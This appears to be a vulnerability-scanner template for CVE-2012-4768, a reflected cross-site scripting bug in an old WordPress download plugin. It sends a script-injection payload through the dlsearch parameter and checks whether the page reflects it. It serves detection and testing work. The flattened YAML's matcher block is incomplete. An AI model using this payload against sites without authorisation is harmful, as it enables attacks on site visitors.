id: CVE-2012-4768
info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-4768
- http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt
- http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/78422
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2012-4768
cwe-id: CWE-79
epss-score: 0.00922
cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:*
epss-percentile: 0.80933
metadata:
max-request: 1
framework: wordpress
vendor: mikejolley
product: download_monitor
tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress
http:
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
part: header
- text/html
- type: status
status:
- 200